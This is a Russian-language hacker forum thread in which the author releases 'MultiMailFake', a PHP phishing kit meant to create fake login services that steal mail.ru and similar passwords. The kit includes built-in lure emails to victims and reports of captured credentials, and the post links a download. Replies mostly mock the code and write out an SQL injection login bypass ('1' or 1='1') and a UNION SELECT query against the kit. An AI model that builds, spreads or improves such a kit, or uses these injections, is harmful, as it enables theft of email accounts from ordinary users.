![]() |
[MMF] - MultiMailFake
[MMF] 0.2 MMF - MultiMailFake.Скрипт служит,для создания Фейк сервисов,для кражи паролей от mail.ru\аналогов. Возможности: [+] -Регистрация пользователей\Личный кабинет(мульти режим) [+] -Отправка Письма жертве прям из скрипта.(со втроенным примером) [+] -Отправка отчетов пользователю на email(по желанию) [+] -++ Изменен интерфейс.Местами переписан. Вообщем пока, что скрипт простоват,но работает вполне отлично. Писал для своего будущего сервиса,но потом желание пропало,да и дел по мимо него много. А так как я за Опенсурс,то скрипты радушно выкладываю в паблик) Код кривоват,но работает.... Просьба не писать комментарии,с текстом типа: а я бы сделал вот так ... Так как мне ровно пофиг,как бы вы сделали..... Скачать MMF 0.2 |
Нашел 15 минут свободного времени.Дописал.
Обновил первый пост. |
Привыкли писать скрипты на error_reporting(0);
Код:
Notice: A session had already been started - ignoring session_start() in C:\wamp\www\1\regi.php on line 59PHP код:
Любой логин и пароль: Код:
1' or 1='1Если чесно, не в обиду, скрипт УГ)))) После скули дальнейший код не смотрел, интерес пропал. |
Дебагнул...
Цитата:
только вечно и умеешь что обсирать..... |
1. Запросы = queries на английском. Базовые знания английского :)
2. Пути статические. Например, я кинул скрипт в папку MMF, а после cмены настроек, например, редирект идет на /logi.php. Так же и с формой фейка. 3. PHP код:
4. PHP код:
5. PHP код:
|
Цитата:
|
mailbrush
я думаю нет смысла критиковать названия переменных, т.к. релиз бесплатный и выложен для того, чтобы исправить код, помочь. имена переменный каждый задает так, как ему удобно. есть смысл их критиковать, если скрипт выполнен на заказ, хотя ТСу ещё далеко для выполнения заказов. |
Цитата:
файл regi.php: PHP код:
PHP код:
http://img230.imageshack.us/img230/2401/pma.gif Потому что быдло код: PHP код:
PHP код:
PHP код:
PHP код:
Скуль не закрыта: PHP код:
PHP код:
Код:
SELECT count(*) FROM users UNION SELECT count(*) FROM querys;PHP код:
Воощем в итоге я запутался в твоей писанине, непонятно зачем ты продублировал регистрацию еще и в файле logi.php Вот еще гавнокод без проверок, делай что хочеш, просто мего сервис по тренировке хацкеров. PHP код:
PHP код:
PHP код:
Далее: PHP код:
Код:
Warning: strtr() expects at least 2 parameters, 1 given in C:\wamp\www\1\auth.php on line 42Код:
Fatal error: Call to undefined function mailenc() in C:\wamp\www\1\auth.php on line 43PHP код:
Вообщем сил больше нету, в этом "коде" можно коментировать практически каждую 2-ю строку "кода". Цитата:
|
b3, хороший анализ. В дополнениях не нужнается, т.к. действительно, слишком кривой код.
Исправь: Цитата:
|
и так что мы имеем.
Из всего выше описаного я нашел толлько 1 неработающую хрень с опправкой отчетов на мыло, это то что я забыл поставить = а остальное мое желание и мелкие недоделки. вообщем разработка всеравно заморожена.кому нужно будет - доделает. |
| Время: 20:41 |